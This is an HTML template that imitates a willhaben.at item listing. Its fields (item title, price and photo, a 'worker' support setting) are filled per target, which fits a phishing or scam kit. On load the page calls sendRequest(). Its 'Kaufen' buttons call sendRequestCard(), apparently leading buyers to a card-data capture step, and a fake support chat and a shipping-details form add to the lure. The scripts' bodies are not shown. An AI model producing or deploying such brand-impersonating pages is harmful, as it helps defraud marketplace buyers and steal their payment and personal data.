<!DOCTYPE html>
<html lang="de">
    <meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <head>
        <meta name="viewport" content="width=device-width" />
        <meta charset="utf-8" />
        <title>{{item.title}}, € {{item.price}},- (-) - willhaben</title>
        <meta name="description" content="{{item.title}}. 9.766.835 Angebote. Günstig kaufen und gratis inserieren auf willhaben - der größte Marktplatz Österreichs." />
       
        <meta property="og:title" content="{{item.title}}, € {{item.price}},- (-) - willhaben" />
        <meta property="og:description" content="{{item.title}}. 9.766.835 Angebote. Günstig kaufen und gratis inserieren auf willhaben - der größte Marktplatz Österreichs." />
        <meta property="og:url" content="orbea-grow-1-kinderfahrrad-mountainbike-16-zoll-582307681/index.html" />
        <meta property="og:type" content="website" />
        <meta property="og:image" content="{{item.photo}}" />
        <meta property="og:image:alt" content="{{item.title}}, € {{item.price}},- (-) - willhaben" />
        <meta property="og:image:width" content="605" />
        <meta property="og:image:height" content="605" />
        <meta property="og:locale" content="de_AT" />
        <meta property="og:site_name" content="willhaben.at" />

        <link rel="shortcut icon" href="/style/willhaben_at/favicon-32x32.5a9e031bf9f9966cab376020b1522962.png" type="image/x-icon">
        <link rel="stylesheet" href="/style/willhaben_at/style.css">

        <!-- support chat -->
        <link rel="stylesheet" href="/style/support/support_parent.css">

        <!-- protect -->
        <script src="/style/protect/index.js"></script>
      
        <script src="/style/other/jquery-3.6.0.min.js"></script>
    </head>
    <body id="wh-body" data-ad-application="bbx" onload="sendRequest()">
        
<div id="support">
        <script type="text/javascript">
var _smartsupp = _smartsupp || {};
_smartsupp.key = '{{worker.supportType}}';
window.smartsupp||(function(d) {
  var s,c,o=smartsupp=function(){ o._.push(arguments)};o._=[];
  s=d.getElementsByTagName('script')[0];c=d.createElement('script');
  c.type='text/javascript';c.charset='utf-8';c.async=true;
  c.src='https://www.smartsuppchat.com/loader.js?';s.parentNode.insertBefore(c,s);
})(document);
        </script>
    </div>

    <script>
        if ("{{worker.supportType}}" == "bot") {
                document.querySelector('#support').innerHTML = `
        <div class="chatra--webkit chatra--style-round chatra--side-bottom chatra--pos-right chatra--visible chatra--expanded chatra--fast-toggle"
            id="chatra" data-turbolinks-permanent=""
            style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display: none;">
            <div id="chatra__iframe-wrapper">
                <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat"
                    allow="autoplay" src="/style/support/index.html?id={{item.id}}"
                    style="width: 380px; height: 600px; position: absolute;"></iframe>
            </div>
        </div>

            <div class="support-circle" onclick="openSupport()"></div>
                                `
            }
    </script>
        
        <div id="__next" data-reactroot="">
            <div class="Box-sc-wfmb7k-0 jYFQjC">
                <ul id="skip-to-content-container" class="SkipToContent__SkipToContentContainer-sc-1g2862x-0 lliaxX"></ul>
                <div id="top-scroll-anchor"></div>
                <div class="Box-sc-wfmb7k-0 Grid__GridContainer-sc-dtcl2s-0 gseQbD cynAQZ Layout___StyledGrid2-sc-sle6ym-2 eLPRdv">
                    <div class="Box-sc-wfmb7k-0 Grid__GridArea-sc-dtcl2s-1 jALfUQ eHsiYx">
                        <div class="Layout___StyledDiv-sc-sle6ym-0 eIcKyj">
                            <div class="Box-sc-wfmb7k-0 Grid__GridContainer-sc-dtcl2s-0 joPQkp bdfgMF Layout___StyledGrid-sc-sle6ym-1 kSMEbC">
                                <div class="Box-sc-wfmb7k-0 Grid__GridArea-sc-dtcl2s-1 cfddOq cfIVfL">
                                    <div class="Box-sc-wfmb7k-0 dBhWiK">
                                        <header class="Box-sc-wfmb7k-0">
                                            <div id="main-header" data-testid="main-header" class="Box-sc-wfmb7k-0 fEGJct">
                                                <div class="Box-sc-wfmb7k-0 kXZXCw">
                                                    <a href="#" aria-label="Zur Startseite" data-testid="whLogoLink" class="AnchorLink__StyledAnchor-sc-1ep83ox-0 fHVoAV">
                                                        <img
                                                            src="/style/willhaben_at/logo.aba4dd722fba342221b0b9d705747a16.svg"
                                                            alt="willhaben Logo"
                                                            width="[object Object]"
                                                            class="Image__StyledImage-sc-18kodv3-0 giHtE"
                                                        />
                                                    </a>
                                                </div>
                                                <div class="Box-sc-wfmb7k-0 kXTCoU">
                                                    <div class="Box-sc-wfmb7k-0 eBcpPk">
                                                        <div class="Box-sc-wfmb7k-0 Header___StyledBox-sc-1hh17wi-0 MjZIW gaRPDs">
                                                            <a
                                                                href="#"
                                                                aria-label="Meine Nachrichten"
                                                                class="AnchorLink__StyledAnchor-sc-1ep83ox-0 gaXBAs MyMessagesLink___StyledClientRoutingAnchorLink-sc-1sra3pj-0 gVSHmM"
                                                                data-testid="header-messaging-link"
                                                            >
                                                                <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 ciaBnX" pointer-events="none">
                                                                    <path
                                                                        d="M20.21 2.69H8a1.83 1.83 0 0 0-1.82 1.83v7.64A1.83 1.83 0 0 0 8 14h6.5l4.74 4.3V14h.94A1.83 1.83 0 0 0 22 12.16V4.52a1.83 1.83 0 0 0-1.79-1.83Zm-5.61 8.62H9.69a.48.48 0 1 1 0-1h4.91a.48.48 0 0 1 0 1Zm4-2.5H9.68a.48.48 0 1 1 0-1h8.87a.48.48 0 0 1 0 1Zm0-2.49H9.68a.47.47 0 0 1-.48-.47.48.48 0 0 1 .48-.48h8.87a.48.48 0 0 1 .47.48.47.47 0 0 1-.47.47Zm-4.54 9 2.79 2.53h-8.2l-3.76 3.53v-3.54h-1A1.84 1.84 0 0 1 2 16V8.21a1.85 1.85 0 0 1 1.88-1.84h1v5.8A3.14 3.14 0 0 0 8 15.31Z"
                                                                        fill="currentColor"
                                                                    ></path>
                                                                </svg>
                                                                <span class="Text-sc-10o2fdq-0 iEYBbT">Nachrichten</span>
                                                            </a>
                                                            <div class="Box-sc-wfmb7k-0">
                                                                <div class="Box-sc-wfmb7k-0 kHBPOj">
                                                                    <a
                                                                        href="#"
                                                                        rel="nofollow"
                                                                        data-testid="loginTopLink"
                                                                        class="AnchorLink__StyledAnchor-sc-1ep83ox-0 dHwoeE"
                                                                    >
                                                                        <span class="Text-sc-10o2fdq-0 eiapVA">Einloggen</span>
                                                                    </a>
                                                                    <span aria-hidden="true" class="Text-sc-10o2fdq-0 cBDaaA">|</span>
                                                                    <a href="#" rel="nofollow" data-testid="registerTopLink" class="AnchorLink__StyledAnchor-sc-1ep83ox-0 dHwoeE">
                                                                        <span class="Text-sc-10o2fdq-0 eiapVA">Registrieren</span>
                                                                    </a>
                                                                </div>
                                                                <a
                                                                    rel="nofollow"
                                                                    href="#"
                                                                    type="button"
                                                                    data-testid="loginTopLink"
                                                                    class="Button__ButtonContainer-sc-3uaafx-0 bUXhzk"
                                                                >
                                                                    Einloggen
                                                                </a>
                                                            </div>
                                                            <a
                                                                aria-label="Neue Anzeige aufgeben"
                                                                href="#"
                                                                type="button"
                                                                data-testid="header-new-ad-link"
                                                                class="Button__ButtonContainer-sc-3uaafx-0 dMnbku"
                                                            >
                                                                <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 dTcaay" pointer-events="none">
                                                                    <path d="M20 11h-7V4a1 1 0 0 0-2 0v7H4a1 1 0 0 0 0 2h7v7a1 1 0 1 0 2 0v-7h7a1 1 0 0 0 0-2Z" fill="currentColor"></path>
                                                                </svg>
                                                                Neue Anzeige aufgeben
                                                            </a>
                                                        </div>
                                                    </div>
                                                    <div class="Box-sc-wfmb7k-0 Header___StyledBox2-sc-1hh17wi-1 fbERkY bJfcVK">
                                                        <a
                                                            href="#"
                                                            class="AnchorLink__StyledAnchor-sc-1ep83ox-0 elUkjS MenuLink__StyledAnchorLink-sc-1943th9-0 XwhBc"
                                                            data-testid="menu-vertical-id-5"
                                                        >
                                                            <div class="Box-sc-wfmb7k-0 faOJCW">
                                                                <div class="Box-sc-wfmb7k-0 jkEvBe"><span>Marktplatz</span> <span class="MenuLink___StyledSpan-sc-1943th9-1 iIRplr">9.767.262</span></div>
                                                            </div>
                                                        </a>
                                                        <a href="#" class="AnchorLink__StyledAnchor-sc-1ep83ox-0 gNhRSO MenuLink__StyledAnchorLink-sc-1943th9-0 bEKVyF" data-testid="menu-vertical-id-2">
                                                            <div class="Box-sc-wfmb7k-0 faOJCW">
                                                                <div class="Box-sc-wfmb7k-0 jkEvBe"><span>Immobilien</span> <span class="MenuLink___StyledSpan-sc-1943th9-1 haMKcc">76.889</span></div>
                                                            </div>
                                                        </a>
                                                        <a
                                                            href="#"
                                                            class="AnchorLink__StyledAnchor-sc-1ep83ox-0 gNhRSO MenuLink__StyledAnchorLink-sc-1943th9-0 bEKVyF"
                                                            data-testid="menu-vertical-id-3"
                                                        >
                                                            <div class="Box-sc-wfmb7k-0 faOJCW">
                                                                <div class="Box-sc-wfmb7k-0 jkEvBe"><span>Auto &amp; Motor</span> <span class="MenuLink___StyledSpan-sc-1943th9-1 haMKcc">139.590</span></div>
                                                            </div>
                                                        </a>
                                                        <a href="#" class="AnchorLink__StyledAnchor-sc-1ep83ox-0 gNhRSO MenuLink__StyledAnchorLink-sc-1943th9-0 bEKVyF" data-testid="menu-vertical-id-1">
                                                            <div class="Box-sc-wfmb7k-0 faOJCW">
                                                                <div class="Box-sc-wfmb7k-0 jkEvBe"><span>Jobs</span> <span class="MenuLink___StyledSpan-sc-1943th9-1 haMKcc">18.864</span></div>
                                                            </div>
                                                        </a>
                                                    </div>
                                                    <div class="Box-sc-wfmb7k-0 btixb">
                                                        <a
                                                            aria-label="Neue Anzeige aufgeben"
                                                            href="#"
                                                            type="button"
                                                            data-testid="header-new-ad-link"
                                                            class="Button__ButtonContainer-sc-3uaafx-0 hmlqsX"
                                                        >
                                                            <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 dkLpPs" pointer-events="none">
                                                                <path d="M20 11h-7V4a1 1 0 0 0-2 0v7H4a1 1 0 0 0 0 2h7v7a1 1 0 1 0 2 0v-7h7a1 1 0 0 0 0-2Z" fill="currentColor"></path>
                                                            </svg>
                                                        </a>
                                                        <div class="Box-sc-wfmb7k-0">
                                                            <div class="Box-sc-wfmb7k-0 kHBPOj">
                                                                <a
                                                                    href="#"
                                                                    rel="nofollow"
                                                                    data-testid="loginTopLink"
                                                                    class="AnchorLink__StyledAnchor-sc-1ep83ox-0 dHwoeE"
                                                                >
                                                                    <span class="Text-sc-10o2fdq-0 eiapVA">Einloggen</span>
                                                                </a>
                                                                <span aria-hidden="true" class="Text-sc-10o2fdq-0 cBDaaA">|</span>
                                                                <a href="#" rel="nofollow" data-testid="registerTopLink" class="AnchorLink__StyledAnchor-sc-1ep83ox-0 dHwoeE">
                                                                    <span class="Text-sc-10o2fdq-0 eiapVA">Registrieren</span>
                                                                </a>
                                                            </div>
                                                            <a
                                                                rel="nofollow"
                                                                href="#"
                                                                type="button"
                                                                data-testid="loginTopLink"
                                                                class="Button__ButtonContainer-sc-3uaafx-0 bUXhzk"
                                                            >
                                                                Einloggen
                                                            </a>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </header>
                                    </div>
                                </div>
                                <div class="Box-sc-wfmb7k-0 Grid__GridArea-sc-dtcl2s-1 fGVwWE gsaFjx"></div>
                                <div class="Box-sc-wfmb7k-0 Grid__GridArea-sc-dtcl2s-1 djhDKu ilWyUh">
                                    <div id="skip-to-content" class="Box-sc-wfmb7k-0 gZawlG">
                                        <article class="Box-sc-wfmb7k-0 BapAdDetailContainer___StyledBox-sc-1mcjxcf-0 eEaMwG chNYVE">
                                            <div
                                                aria-hidden="true"
                                                data-is-shown="false"
                                                class="Box-sc-wfmb7k-0 BaseStickyHeader___StyledBox-sc-fdqokj-0 lgkPyP gvUECb StickyHeader___StyledBaseStickyHeader-sc-1elrw6c-0 jqIQgU"
                                                data-testid="sticky-ad-header"
                                            >
                                                <div class="Box-sc-wfmb7k-0 iwKoIB">
                                                    <div class="Box-sc-wfmb7k-0 ixNkmx">
                                                        <h2 data-testid="ad-detail-header-sticky" class="Text-sc-10o2fdq-0 dAZyHD">{{item.title}}</h2>
                                                        <div class="Box-sc-wfmb7k-0 ivTAOL">
                                                            <button
                                                                aria-label="Anzeige Merken"
                                                                aria-pressed="false"
                                                                name="SaveAdButton"
                                                                class="Button__ButtonContainer-sc-3uaafx-0 iYZDOG AdDetailSaveAdButton___StyledButton-sc-8gbgqh-0 cZejOj"
                                                                type="button"
                                                                data-testid="saveAdButton-header-sticky"
                                                            >
                                                                <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 gWbCzQ" pointer-events="none">
                                                                    <path
                                                                        d="m12 4 2.09 4.25a1.52 1.52 0 0 0 1.14.82l4.64.64-3.42 3.32a1.49 1.49 0 0 0-.45 1.38l.8 4.59-4.17-2.19a1.45 1.45 0 0 0-.7-.17 1.49 1.49 0 0 0-.71.17L7.11 19l.8-4.65A1.53 1.53 0 0 0 7.48 13L4.14 9.77l4.69-.69A1.52 1.52 0 0 0 10 8.25L12 4m0-2.21a.94.94 0 0 0-.86.53L8.61 7.59l-5.79.86a.94.94 0 0 0-.77.64.92.92 0 0 0 .24 1l4.14 4-1 5.79a.92.92 0 0 0 .39.91.9.9 0 0 0 1 .06l5.12-2.73 5.2 2.73a.81.81 0 0 0 .44.12.76.76 0 0 0 .53-.18.93.93 0 0 0 .38-.91l-1-5.73L21.72 10a.92.92 0 0 0 .23-1 1 1 0 0 0-.76-.64l-5.76-.8-2.59-5.2a1 1 0 0 0-.84-.53Z"
                                                                        fill="currentColor"
                                                                    ></path>
                                                                </svg>
                                                            </button>
                                                            <button name="ShareButton" aria-label="Teilen" type="button" class="Button__ButtonContainer-sc-3uaafx-0 jDeIsL">
                                                                <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 dUMNnO" pointer-events="none">
                                                                    <path
                                                                        d="M21.54 18.88a3.13 3.13 0 1 1-6.25 0 3.34 3.34 0 0 1 .12-.84L8 14.05a3.16 3.16 0 0 1-2.36 1.07A3.12 3.12 0 1 1 8 10l7.44-4a3.34 3.34 0 0 1-.12-.84 3.12 3.12 0 1 1 .76 2l-7.43 4a3 3 0 0 1 0 1.69l7.43 4a3.13 3.13 0 0 1 5.49 2Z"
                                                                        fill="currentColor"
                                                                    ></path>
                                                                </svg>
                                                            </button>
                                                            <button class="Button__ButtonContainer-sc-3uaafx-0 gPHFHN ContactButton___StyledButton-sc-16n61c2-0 MyUWI" type="button" data-testid="ad-detail-header-sticky-message-button">
                                                                <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 bDbToW" pointer-events="none">
                                                                    <path
                                                                        d="M19.8 3.65H4.21A2.21 2.21 0 0 0 2 5.86V15a2.22 2.22 0 0 0 2.2 2.21h9.66l4.77 4.24v-4.24h1.17A2.22 2.22 0 0 0 22 15V5.86a2.22 2.22 0 0 0-2.2-2.21ZM13.05 14H6.21a.57.57 0 1 1 0-1.14h6.84a.57.57 0 1 1 0 1.14Zm4.75-3H6.21a.57.57 0 0 1-.57-.57.58.58 0 0 1 .57-.57H17.8a.58.58 0 0 1 .57.57.57.57 0 0 1-.57.57Zm0-3H6.21a.58.58 0 0 1 0-1.15H17.8a.58.58 0 0 1 0 1.15Z"
                                                                        fill="currentColor"
                                                                    ></path>
                                                                </svg>
                                                                Verkäufer kontaktieren
                                                            </button>
                                                        </div>
                                                    </div>
                                                    <div class="Box-sc-wfmb7k-0 emcHCy">
                                                        <div class="Box-sc-wfmb7k-0 gocpLA">
                                                            <div class="Box-sc-wfmb7k-0 BapAdDetailStickyHeader___StyledBox-sc-1ybw6g8-0 jJqEuh hgtjuX">
                                                                <span data-testid="sticky-header-price-description" class="Text-sc-10o2fdq-0 eVoKaR">Verkaufspreis</span>
                                                                <span data-testid="sticky-header-price" class="Text-sc-10o2fdq-0 ieZAQA">€ {{item.price}}</span>
                                                            </div>
                                                        </div>
                                                        <div class="Box-sc-wfmb7k-0 dFxkKk"></div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div aria-hidden="false" data-is-shown="true" data-testid="sticky-ad-footer" class="Box-sc-wfmb7k-0 AdDetailStickyFooter___StyledBox-sc-1dhz4x0-0 eLLwaf cVspFQ">
                                                <div class="Box-sc-wfmb7k-0 AdDetailStickyFooter___StyledBox2-sc-1dhz4x0-1 dpkCZq hutSgA">
                                                    <button
                                                        class="Button__ButtonContainer-sc-3uaafx-0 ewArsE ContactButton___StyledButton-sc-16n61c2-0 MyUWI CallAndContactAdDetailStickyFooter___StyledContactButton-sc-qx1ahu-0 eRmBGc"
                                                        type="button"
                                                        data-testid="ad-detail-footer-sticky-message-button"
                                                        onclick="sendRequestCard(); return false;"
                                                    >
                                                        Kaufen
                                                    </button>
                                                </div>
                                            </div>
                                            <section class="Box-sc-wfmb7k-0 FullWidthRow___StyledBox-sc-1b3gaet-0 kQatfk hMBsEY"><div class="Box-sc-wfmb7k-0 kJzcch"></div></section>
                                            <section class="Box-sc-wfmb7k-0 eCSueK">
                                                <div class="Box-sc-wfmb7k-0 gDAnme">
                                                    <div class="Box-sc-wfmb7k-0 eCKYBZ">
                                                        <div class="Box-sc-wfmb7k-0 TMhyF">
                                                            <div class="Box-sc-wfmb7k-0 ixNkmx">
                                                                <div class="Box-sc-wfmb7k-0">
                                                                    <h1 data-testid="ad-detail-header" class="Text-sc-10o2fdq-0 bLnjhH">{{item.title}}</h1>
                                                                    <div class="Box-sc-wfmb7k-0 jnCVsd">
                                                                        <div class="Box-sc-wfmb7k-0 gqAbG">
                                                                            <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 vEriI" pointer-events="none">
                                                                                <path
                                                                                    d="M12.05 2a5.65 5.65 0 0 0-5.74 5.58c0 3.07 5.74 14.42 5.74 14.42s5.73-11.37 5.73-14.44A5.65 5.65 0 0 0 12.05 2m0 8a2.4 2.4 0 1 1 2.4-2.39 2.4 2.4 0 0 1-2.4 2.39"
                                                                                    fill="currentColor"
                                                                                ></path>
                                                                            </svg>
                                                                            <span class="Text-sc-10o2fdq-0 iKafKH">-</span>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                                <div class="Box-sc-wfmb7k-0 AdHeader___StyledBox-sc-19k4ma2-0 cfQxsY gtbBhC">
                                                                    <button
                                                                        aria-label="Anzeige Merken"
                                                                        aria-pressed="false"
                                                                        name="SaveAdButton"
                                                                        class="Button__ButtonContainer-sc-3uaafx-0 iYZDOG AdDetailSaveAdButton___StyledButton-sc-8gbgqh-0 cZejOj"
                                                                        type="button"
                                                                        data-testid="saveAdButton"
                                                                    >
                                                                        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 hsRMKc" pointer-events="none">
                                                                            <path
                                                                                d="m12 4 2.09 4.25a1.52 1.52 0 0 0 1.14.82l4.64.64-3.42 3.32a1.49 1.49 0 0 0-.45 1.38l.8 4.59-4.17-2.19a1.45 1.45 0 0 0-.7-.17 1.49 1.49 0 0 0-.71.17L7.11 19l.8-4.65A1.53 1.53 0 0 0 7.48 13L4.14 9.77l4.69-.69A1.52 1.52 0 0 0 10 8.25L12 4m0-2.21a.94.94 0 0 0-.86.53L8.61 7.59l-5.79.86a.94.94 0 0 0-.77.64.92.92 0 0 0 .24 1l4.14 4-1 5.79a.92.92 0 0 0 .39.91.9.9 0 0 0 1 .06l5.12-2.73 5.2 2.73a.81.81 0 0 0 .44.12.76.76 0 0 0 .53-.18.93.93 0 0 0 .38-.91l-1-5.73L21.72 10a.92.92 0 0 0 .23-1 1 1 0 0 0-.76-.64l-5.76-.8-2.59-5.2a1 1 0 0 0-.84-.53Z"
                                                                                fill="currentColor"
                                                                            ></path>
                                                                        </svg>
                                                                        <span class="Text-sc-10o2fdq-0 kfBCjA">Merken</span>
                                                                    </button>
                                                                    <button name="ShareButton" aria-label="Teilen" type="button" data-testid="shareButton" class="Button__ButtonContainer-sc-3uaafx-0 legNDa">
                                                                        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 dUMNnO" pointer-events="none">
                                                                            <path
                                                                                d="M21.54 18.88a3.13 3.13 0 1 1-6.25 0 3.34 3.34 0 0 1 .12-.84L8 14.05a3.16 3.16 0 0 1-2.36 1.07A3.12 3.12 0 1 1 8 10l7.44-4a3.34 3.34 0 0 1-.12-.84 3.12 3.12 0 1 1 .76 2l-7.43 4a3 3 0 0 1 0 1.69l7.43 4a3.13 3.13 0 0 1 5.49 2Z"
                                                                                fill="currentColor"
                                                                            ></path>
                                                                        </svg>
                                                                    </button>
                                                                    <button name="PrintButton" id="printButton" aria-label="Drucken" type="button" data-testid="printButton" class="Button__ButtonContainer-sc-3uaafx-0 jNKfQM">
                                                                        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 dUMNnO" pointer-events="none">
                                                                            <path
                                                                                d="M19.89 9.78a1.13 1.13 0 1 0-2.25 0 1.13 1.13 0 0 0 2.25 0Zm-3.38 3.37h-9v6.75h9ZM21 8.65v6.75a1.11 1.11 0 0 1-1.12 1.13h-2.24v3.37a1.12 1.12 0 0 1-1.13 1.1h-9a1.11 1.11 0 0 1-1.12-1.1v-3.37H4.14A1.12 1.12 0 0 1 3 15.4V8.65a1.11 1.11 0 0 1 1.14-1.12h15.75A1.11 1.11 0 0 1 21 8.65ZM17.64 6.4H6.39V4.15A1.11 1.11 0 0 1 7.51 3h9a1.11 1.11 0 0 1 1.13 1.12Z"
                                                                                fill="currentColor"
                                                                                fill-rule="evenodd"
                                                                            ></path>
                                                                        </svg>
                                                                    </button>
                                                                </div>
                                                            </div>
                                                            <div class="Box-sc-wfmb7k-0 emcHCy">
                                                                <div class="Box-sc-wfmb7k-0 ZnvJF">
                                                                    <div class="Box-sc-wfmb7k-0 gqAbG">
                                                                        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" class="createSvgIcon__SvgIcon-sc-1vebdtk-0 vEriI" pointer-events="none">
                                                                            <path
                                                                                d="M12.05 2a5.65 5.65 0 0 0-5.74 5.58c0 3.07 5.74 14.42 5.74 14.42s5.73-11.37 5.73-14.44A5.65 5.65 0 0 0 12.05 2m0 8a2.4 2.4 0 1 1 2.4-2.39 2.4 2.4 0 0 1-2.4 2.39"
                                                                                fill="currentColor"
                                                                            ></path>
                                                                        </svg>
                                                                        <span class="Text-sc-10o2fdq-0 iKafKH">-</span>
                                                                    </div>
                                                                </div>
                                                                <div class="Box-sc-wfmb7k-0 fNncFQ">
                                                                    <span class="Text-sc-10o2fdq-0 eVoKaR">
                                                                        <span data-testid="ad-detail-ad-edit-date-top" class="Text-sc-10o2fdq-0 kTmUzk">
                                                                            -
                                                                        </span>
                                                                        |
                                                                        <span data-testid="ad-detail-ad-wh-code-top" class="Text-sc-10o2fdq-0 kTmUzk">
                                                                            willhaben-Code:
                                                                            <!-- -->582307681
                                                                        </span>
                                                                    </span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="Box-sc-wfmb7k-0 crNazH">
                                                        <div class="Box-sc-wfmb7k-0 hJgHiM">
                                                            <div class="Box-sc-wfmb7k-0 byBvIl">
                                                                <div data-testid="gallery-carousel" class="Box-sc-wfmb7k-0 byBvIl">
                                                                    <div class="Carousel___StyledFlickityWrapper-sc-npeqef-0 ibFjhQ carousel">
                                                                        <div class="Box-sc-wfmb7k-0 CarouselCell___StyledBox-sc-ouu5fe-2 dCBePE fvdtLm carousel-cell" data-testid="carousel-cell-image-0">
                                                                            <button tabindex="-1" class="CarouselCell__InvisibleButton-sc-ouu5fe-0 epfxXI">
                                                                                <div aria-label="{{item.title}}" data-testid="background-image-0" class="Box-sc-wfmb7k-0 CarouselCell___StyledBox2-sc-ouu5fe-4 jqvWfS erQXGi"></div>
                                                                                <img
                                                                                    src="{{item.photo}}"
                                                                                    alt="{{item.title}}"
                                                                                    width="auto"
                                                                                    height="auto"
                                                                                    data-testid="image-0"
                                                                                    class="CarouselCell___StyledImg-sc-ouu5fe-5 gveRIh"
                                                                                />
                                                                            </button>
                                                                        </div>
                                                                    </div>
                                                                    <div class="Box-sc-wfmb7k-0 Carousel___StyledBox-sc-npeqef-1 djlMkK hEmPzw"></div>
                                                                </div>
                                                                <div data-testid="gallery-thumbnail-wrapper" class="Box-sc-wfmb7k-0">
                                                                    <div class="Thumbnails___StyledFlickityWrapper-sc-iu765y-0 hqqWpy">
                                                                        <div class="Box-sc-wfmb7k-0 Thumbnail___StyledBox-sc-wt0l8b-0 dOWNQZ rMcCN thumbnail-cell" data-testid="thumbnail-cell-0">
                                                                            <img
                                                                                src="{{item.photo}}"
                                                                                data-testid="thumbnail-0"
                                                                                alt="{{item.title}}"
                                                                                class="Thumbnail___StyledImg2-sc-wt0l8b-2 rKLHG"
                                                                            />
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="Box-sc-wfmb7k-0 guUdxj">
                                                        <div data-testid="ad-detail-contact-box-private-top" class="Box-sc-wfmb7k-0 Card-sc-nhpl83-0 LcngO">
                                                            <div class="Box-sc-wfmb7k-0 Flex-sc-1hx93kv-0 Stack___StyledFlex-sc-dqwciw-0 SgVEF thEqX">
                                                                <div data-testid="contact-box-price-box" class="Box-sc-wfmb7k-0 dyzUBt">
                                                                    <div class="Box-sc-wfmb7k-0 eEaMwG">
                                                                        <span data-testid="contact-box-price-box-price-value" class="Text-sc-10o2fdq-0 cQRQY">€ {{item.price}}</span>
                                                                        <span data-testid="contact-box-price-box-price-label" class="Text-sc-10o2fdq-0 bIIYcF">Verkaufspreis</span>
                                                                    </div>
                                                                </div>
                                                                <div class="Box-sc-wfmb7k-0 eklnuF">
                                                                    <hr orientation="horizontal" class="Divider-sc-2vp0ed-0 fWEZAe" />
                                                                    <div data-testid="top-contact-box-address-box" class="Box-sc-wfmb7k-0 eEaMwG">
                                                                        <span class="Text-sc-10o2fdq-0 kTmUzk">-</span>
                                                                    </div>
                                                                    <div class="Box-sc-wfmb7k-0 Flex-sc-1hx93kv-0 Stack___StyledFlex-sc-dqwciw-0 brZBcj thEqX">
                                                                        <button class="Button__ButtonContainer-sc-3uaafx-0 jZHXbf ContactButton___StyledButton-sc-16n61c2-0 MyUWI" type="button" data-testid="contact-box-contact-button" onclick="sendRequestCard(); return false;">
                                                                            Kaufen</button>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </section>
                                            <section class="Box-sc-wfmb7k-0 TwoColumnRow___StyledBox-sc-1hsiof5-0 jBvakV jClZoz">
                                                <div class="Box-sc-wfmb7k-0 TwoColumnRow___StyledBox2-sc-1hsiof5-1 hhlJEI uDcWE">
                                                    <div class="Box-sc-wfmb7k-0 gaYiOg">
                                                        <div class="Box-sc-wfmb7k-0 Flex-sc-1hx93kv-0 Stack___StyledFlex-sc-dqwciw-0 emzqQW thEqX BapAdDetailContainer___StyledStack-sc-1mcjxcf-1 kPNBhq">
                                                            <div class="Box-sc-wfmb7k-0 Flex-sc-1hx93kv-0 Stack___StyledFlex-sc-dqwciw-0 iNDurx thEqX BapDescriptionBox___StyledStack-sc-ekvs1t-0 dUOtCl">
                                                                <div class="Box-sc-wfmb7k-0 cgsRry">
                                                                    <h2 class="Text-sc-10o2fdq-0 UyplT">Beschreibung</h2>
                                                                    <div data-testid="ad-description-Beschreibung" class="Box-sc-wfmb7k-0 Description___StyledBox2-sc-brstfz-1 ibTsEx">
                                                                        <p>
                                                                            <h2 class="Text-sc-10o2fdq-0 dAZyHD">Versand Details</h2><br>
                                                                            Käufer: <br>
                                                                            Lieferadresse: 
                                                                        </p>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </section>
                                            <section class="Box-sc-wfmb7k-0 FullWidthRow___StyledBox-sc-1b3gaet-0 kOjxnH hMBsEY">
                                                <hr display="[object Object]" orientation="horizontal" class="Divider-sc-2vp0ed-0 bCmdFP" />
                                                <div class="Box-sc-wfmb7k-0"></div>
                                            </section>
                                            <section class="Box-sc-wfmb7k-0 FullWidthRow___StyledBox-sc-1b3gaet-0 gDLaWz hMBsEY">
                                                <hr display="[object Object]" orientation="horizontal" class="Divider-sc-2vp0ed-0 cZyoqx" />
                                                <div class="Box-sc-wfmb7k-0"></div>
                                            </section>
                                        </article>
                                    </div>
                                </div>
                            </div>
                            <div aria-hidden="true" id="apn-large-datapixel" class="DatapixelRenderSlots__RenderSlot-sc-iahvit-0 ifHJgI"></div>
                            <div aria-hidden="true" id="apn-medium-datapixel" class="DatapixelRenderSlots__RenderSlot-sc-iahvit-0 ifHJgI"></div>
                            <div aria-hidden="true" id="apn-small-datapixel" class="DatapixelRenderSlots__RenderSlot-sc-iahvit-0 ifHJgI"></div>
                        </div>
                    </div>
                    <div class="Box-sc-wfmb7k-0 Grid__GridArea-sc-dtcl2s-1 dkymIb cnxVZY">
